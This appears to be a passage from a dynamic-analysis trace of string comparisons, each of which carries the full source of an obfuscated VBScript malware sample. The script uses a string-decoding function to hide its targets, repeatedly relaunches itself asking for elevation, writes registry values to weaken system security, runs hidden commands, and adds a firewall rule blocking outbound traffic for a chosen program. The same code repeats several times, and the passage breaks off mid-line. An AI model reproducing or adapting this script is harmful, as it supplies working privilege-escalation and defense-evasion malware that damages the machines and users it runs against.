= CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.978] wcsncmp (_String1="\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0222.978] wcsncmp (_String1="\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.979] wcsncmp (_String1="Const ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0222.979] wcsncmp (_String1="onst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 98 [0222.979] wcsncmp (_String1="nst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite 